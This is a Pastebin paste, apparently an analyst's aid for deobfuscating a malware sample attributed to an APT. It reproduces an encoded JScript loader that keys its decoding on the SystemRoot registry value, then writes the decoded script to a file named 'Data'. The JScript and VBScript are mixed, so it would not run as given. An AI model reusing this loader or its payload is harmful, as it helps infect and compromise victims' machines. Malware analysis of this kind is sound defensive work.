Advertisement
hoangcuongflp

Deobfuscate malware APT MOFA

Apr 13th, 2017
184
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var arGDJbyR = "ChCydCo+xCqh" +
  2.     "-C-vCf-dC-sC-h+%yd-C-uC(-C5C-3zvk(5-3C(6C-G(5-C3q-h" +
  3.     "-z" +
  4.     "C(5C3DfCwlCyh[C-RCe-Cmh-fwC(-5-;(5-C" +
  5.     "5zvfuCl-C-swC-(" +
  6.     "-C5-C-Hvkh-oo(-5" +
  7.     "5-(C5-C" +
  8.     "<-(-C6-C-EC(3-G(3DCyCdCu(53vkC(5" +
  9.     "3(6-G(5C3q-h-z(" +
  10.     "53-Df-wl-y-hC[CR-e-mChfwC(5;-(55-v-kCho-o(5-Hd-C-s" +
  11.     "so" +
  12.     "-l-C" +
  13.     "-f" +
  14.     "-dw-lr-C-q-C-(-5C5(-C5" +
  15.     "-<(6-" +
  16.     "E(-3-G(3-D-yCd-u(5-3CKW-WS(5-3(C6GC(-C5-3-qh-z(53DCf-C-wly-h-C[R-emh-CfCw(5;C-(-5-5PC-V[PC-OC(-C6C-5(-5C-H-[-C-PO-KWWSC-(C-55(5<(C6E-C(-3CG-(-3-DyC-du(53VwuhCdp(53-(6-C-GC(53q-h-zC(-5-" +
  17.     "C-3-D-f-wlCyChC[C-R" +
  18.     "em-h-fCw(5;C(-5-5DG-RGCEC-(5C-HV-wC-uhCdp(5C5(C5C<-(6EC-(" +
  19.     "3CGC(-3DyC-d-u(53s-dwkC(5-3-(-6G(C5-3zvk(" +
  20.     "5-HCVsC-hf" +
  21.     "ldCoC-I-roghuvC(5C-;-(5" +
  22.     "5W-hp-sCod-CwhCv-(-55(5-<(5-EC(C-5-5-(8-C-F(C8FC(" +
  23.     "-55(5E(-C-5;C(5-C;P" +
  24.     "dCw-kC(C-5HCu-dqgrp(5;(5<-(C5DC-(" +
  25.     "C6-" +
  26.     "C<C(-C6<(-C6C<(-6<C(6C-<C-(6C<(-5<(C" +
  27.     "5E-(C6C<C(6<(-C6<(C6<(-:F-(63" +
  28.     "-C(C5-<(5C-EC(-C55C(" +
  29.     "5Hh{h(-C-55-(-6E(-3-C-G-C(3" +
  30.     "D-K" +
  31.     "WC-W-CS(C5HC-Rs-hqC(-C5-;(55-CJH-W(C55(C5-CF(5-3-(55C-kCw-wC" +
  32.     "sC(" +
  33.     "6D-(5IC(-5-CI-gClvnC-(-5-H-vl-C-eoClqjuChyChCo-Cu-|(5-H-q-C-h" +
  34.     "w(-5ICm-v-C(C6C-9(63-(C5Hel-q-(55(-5-FC(C-5C3-iCdov-h(5<-(6EC-(-53K-CWWCS(5H" +
  35.     "C" +
  36.     "-VC-hq-g(5-C-;(5-<(C6CE-(53liC(-5-3-(5-;KW-W-CS(-C-5CH-V-w-C-dwxv(-5C3-C(-6G-(6-GC-(-C-53-(65C(C6-3-(63(5<C-(5C3(C:C-E-C-(3CG-(3DVC-wCuhdp-(-" +
  37.     "C5-H-RC-s-ChCq(5;(C5<C(6E(5" +
  38.     "3CV-Cwuhdp(5H-WC|shC-(C-53-C-(6G-(53(-6-4C(-6CE-(C53Vw-C-" +
  39.     "u-hdp" +
  40.     "(5H-Zu-lCw" +
  41.     "C-h-(5;-KWCWSC" +
  42.     "(-5HU-hC-vCsrqCv-h" +
  43.     "-ErCg|-C(C" +
  44.     "5C-<-C" +
  45.     "(-6-CE(5-3(3GC(C3D" +
  46.     "Vw-" +
  47.     "u-h-dp(5-C-HCSrvC-l-wClr-q(5-3" +
  48.     "-(6-GC(-5-C3C(63C(6-E-C-(5C3VCw-CuhCd-Cp-C(-5C-HVdCyhWrIC-l" +
  49.     "oh(C5-;sd-" +
  50.     "wk-(C5F(" +
  51.     "C53C(-6C-5" +
  52.     "-(-C-5<C(6CEC" +
  53.     "-(3-CGC(C3C" +
  54.     "D-Vw-uhC-dp(" +
  55.     "5-CH-F-oC" +
  56.     "rvh(5-;(-5C<-(-6E-C(53Cvk-(5HVkChC-oo-HC{hfC-xw-h-C(5C;CsdwkC(-C-5-F-(53(C5-5(-55(-5F(53C-(5C-5C-(55(C-5CFC(53-C-(-C5C5Crshq-C(5-5-(5C-F(C5-3(C-6-C4-(-5C<(6E(" +
  57.     "-5-C-3(:G%,,>";
  58. var woFtjhmM = 35068079 / 35068079;
  59. var sjkzVKT = "";
  60. var SXVTApl = "HABCKLM\\sABCOABCfABCtABCwABCaRE\\mABCiCABCroSABCoft\\WABCi" +
  61.     "NdABCOABCWsABC Nt\\c" +
  62.     "urABCr" +
  63.     "ABCeABCnABCt" +
  64.     "ABCVeABCrABCsiON\\SysABCtABCeABC" +
  65.     "MABCRABCoABCoT";
  66. var pgOSvXGb = hUHuMDeP.RegRead(SXVTApl.replace(/\ABC/g, "")).charCodeAt(woFtjhmM);
  67. for (var aUJBPOym = 0; aUJBPOym < arGDJbyR.length; aUJBPOym++) {
  68.     woFtjhmM = arGDJbyR.charCodeAt(aUJBPOym) - 3378 * pgOSvXGb / 65308;
  69.     if ((woFtjhmM != 355740 * pgOSvXGb / 491260) && (woFtjhmM != 139840 * pgOSvXGb / 126730)) {
  70.         sjkzVKT += String.fromCharCode(woFtjhmM);
  71.     }
  72. }
  73.  
  74. Set objFSO = CreateObject("Scripting.FileSystemObject")
  75. outFile = "Data"
  76. Set objFile = objFSO.CreateTextFile(outFile, True)
  77. objFile.Write sjkzVKT & vbCrLf
  78. objFile.Close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement